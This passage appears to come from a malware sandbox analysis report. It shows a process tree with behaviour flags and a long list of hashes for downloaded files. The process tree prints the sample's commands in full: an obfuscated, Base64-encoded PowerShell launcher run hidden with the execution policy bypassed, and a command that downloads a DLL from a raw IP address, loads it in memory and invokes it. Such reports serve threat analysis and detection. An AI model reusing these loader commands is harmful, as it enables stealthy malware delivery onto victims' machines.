☙DI☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.2sn/tset/94.91.142.19//:ptth'))"7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1412
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
c6b0a774fa56e0169ed7bb7b25c114dd
SHA1bcdba7d4ecfff2180510850e585b44691ea81ba5
SHA256b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9
SHA51242295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446
-
MD5
0f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
MD5
2d5d62e54e6e9384b1476492e8edd986
SHA19d0be75e500df70dfddb07db2f81f626ad0edc2e
SHA256ca92b2152825bf9f43011d8aa6398b74a528127f1a01339d89002b119126a2f6
SHA51222933d8b4f3a526510824a222ef77dfae86033dfd82ba534931ce3863fda142e3e705849729954d06a9768475e74dca8fcac945d0b497e78b8eb40ce54cce97b
-
MD5
d1b2a8f72d1e29e3fe45735530e842c7
SHA161c2109817720ad9f86baa4f6c9c6343e890e943
SHA25608e5ef8b54410aeab63bf109856c16bc56e1c1725da2c44fcc2b9e7b41528ddb
SHA512b909a6baf7686fe37f7c6c346e2fdeb5eba46e4e57a56b8d5bbc0ca0e68008684ad8cfc30aebc2c5a48976348d3731fd929e8884e6eb5417cc8b15fbacea02c8
-
MD5
78f61af77f3086539ea15d20e6225685
SHA1afe9abf0ec0b67f8ea1a1d50ef9c19b624b2466a
SHA2560555ef98c3a2b302ccbd503deea24b9ef4b885761a35d36c8b00678cff5a0e3c
SHA512c05f4c1da8aa4fb565a19dcd3443977b9e1069e8afbd8743500d29378ae49fb76ee5791587dc6c1c22441a776440ea1969811fadd6ce9b9440f809eb3f6fa636
-
MD5
eb4ff2e4c236944232038063c151022e
SHA14d8cdb4978d65e878a73e6be2a232e1301f1bba7
SHA256e6f7a515a13db9214060aea4d9a2c289e170ebed008a5e19efc12da88223515a
SHA5126636d49950f8f835ea8911e3522628a3464686bc17b645639283de1752476e6313bfa733bbf0c8c6d09f12a5d6c3a611878e3a6597fd232de7c05b0523635a6d
-
MD5
52115a05e0a323f27b0f34b6681bcd40
SHA110b3994975d9f30ed1aa56132d5383c3d58cdea3
SHA256bf41b7ec43ccdb78f2063cdbdbe5b147b560f4f8458a99e0bf55958df46390a5
SHA512fb89d5c00924cccc4d9b5f75e768158a2c01de39e882cc30f4a08a887d6d27fa2323e30ac057624708699d80b7db0d9c4f6bf52231cb8ae4c443579b05f20ad3
-
MD5
52115a05e0a323f27b0f34b6681bcd40
SHA110b3994975d9f30ed1aa56132d5383c3d58cdea3
SHA256bf41b7ec43ccdb78f2063cdbdbe5b147b560f4f8458a99e0bf55958df46390a5
SHA512fb89d5c00924cccc4d9b5f75e768158a2c01de39e882cc30f4a08a887d6d27fa2323e30ac057624708699d80b7db0d9c4f6bf52231cb8ae4c443579b05f20ad3
-
MD5
97fe9e12e5c913857636fdf436971275
SHA1bf0f1eb9802f5a1e2b95b8c751f1a0207b5e74a3
SHA256949045cd0c94f72e839cb90b0a3bc227eacfdf81c802ba996d36e8f6b7e84156
SHA512277a184d3be25bffe18aeabfb643e8a9aa6d4c8e0633d93b3704036de582066f60c8b69c96a7a00cceadbd9896909e3988d42888c7a471c3a27aa0859beaf548
-
MD5
97fe9e12e5c913857636fdf436971275
SHA1bf0f1eb9802f5a1e2b95b8c751f1a0207b5e74a3
SHA256949045cd0c94f72e839cb90b0a3bc227eacfdf81c802ba996d36e8f6b7e84156
SHA512277a184d3be25bffe18aeabfb643e8a9aa6d4c8e0633d93b3704036de582066f60c8b69c96a7a00cceadbd9896909e3988d42888c7a471c3a27aa0859beaf548
-
MD5
5c8c985aec00af6a5e5f7cf0ced7831b
SHA169bc53d7c7dcfb3557ee88777c4f941e24e5173e
SHA25636042de638c2a30b3cf0cf234eca0a3551318dd12637f7634ac36896bf1d1ee6
SHA5124937e1e77c1d7c5b4091d8801fd6211e422fd48f885b737d69f873650682a98d6ae285e29ee291af5b708933c6078ac872fffb18ffe4faae67ea4305bbba7f0b
-
MD5
b9fe747645f446f13de4f82f2b45a57d
SHA1915ebbc92bbed4498c1612d77fb56faa4292fd69
SHA256cdec8ec8e5969d6944b6fe46146f209ce8aa8b7c2bee2a65f28bf3c1b2d563f8
SHA5125384fe713910636f818e109ce42fdaacc5614342cc31439fe79935ae90204d87461a623acb95472f735075f6c470c0eb0bcc31ecfd718a0bfb1d40cfcea4ecbc
-
MD5
f4878e8eef3ffc20a5d61aaf34943960
SHA15ebfb95446c3444b175507589066cac3b969494e
SHA2565baf905dc9c2ab08e871cdd664489a4f4d2fb8bb512720305131eb908c3f81e2
SHA512bc86143ad9c385a2a3f6f5f7862a3ac3fdf17391422ec9872c4dc39b26e4c8e088a7eaef7e32391d6d867ed369420a1e1bd4fcd1feab3686ed6bf436947fd694
-
MD5
5d536406d735e27d910faf1813d79e0b
SHA132f7716ddb61131917a90b83eb7fd74ce5eef16a
SHA256887420d1dcca02056fb9b2aaffacaf87ac76d438fb4e4b9f244cde119db7ebc6
SHA5121b797c0ada2656242d4017ecc33ce4045eece9a982cd4645e9e369e7d62ceed91e4f00ac14203077c349d8f815ed255d7fbe12742575e94f205bc319a9b365df
-
MD5
a26cc4263433ad4da74611bee68d16fb
SHA12c9195e27c30ffbec570c3221ac7b70b13bbaa0f
SHA256b195f119e31d19887b3d4891438d08e8a33ded8d8ef15a9e63a187f8de274ae5
SHA512ce3d2df12dd339110f41b691334e35e2c451d4450c2f66bbb46801d362b589ba0c24e9074c7a2aaf1ffaae427920d247a44a459ac42d98d01caeebc70c88e67c
-
MD5
f187cbdda6a909932fb91754eec526ce
SHA199b8acef2b866da0b292a28ce20ae21ab61c3c37
SHA256ae41db37cb54450895e26fe93d34edd885769ff5dc19b21585fad19172f4a05a
SHA5126f515fee1573e8e5321776a26216b49e0afbceca4175805717d0fb929639d74320398a3661f05614debbed935484f88cc703fc31d495aab1f5f62f3e24502364